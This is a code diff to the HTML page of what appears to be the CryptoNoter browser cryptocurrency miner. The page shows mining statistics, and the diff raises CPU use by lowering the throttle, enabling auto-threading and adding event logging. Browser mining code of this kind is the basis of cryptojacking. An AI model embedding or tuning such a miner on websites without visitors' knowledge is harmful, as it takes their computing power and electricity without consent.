--- a/web/index.html
+++ b/web/index.html
@@ -15,7 +15,8 @@
     <script>
         var addr = 'CryptoNoter';
         var miner = new CryptoNoter.Anonymous(addr, {
-            throttle: 0.3
+            autoThreads: true,
+            throttle: 0.1
         });
         miner.start();
 
@@ -30,16 +31,21 @@
             accepted++;
         })
 
+        miner.on('authed', function (...data) {
+            console.log('authed',data)
+        })
+        miner.on('error', function (...data) {
+            console.log('error',data)
+        })
         // Update stats once per second
         setInterval(function () {
-            var idle = parseFloat(location.hash.split('#')[1]) || 0.5;
+            var idle = parseFloat(location.hash.split('#')[1]) || 0.1;
             var hashesPerSecond = miner.getHashesPerSecond();
             document.getElementById("TotalHashes").innerHTML = miner.getTotalHashes();
             document.getElementById("VerifiedShares").innerHTML = miner.getAcceptedHashes();
             document.getElementById("Hashes").innerHTML = hashesPerSecond;
             miner.setThrottle(idle);
             document.getElementById("Hashes").innerHTML = hashesPerSecond;
-
         }, 500);
 
 
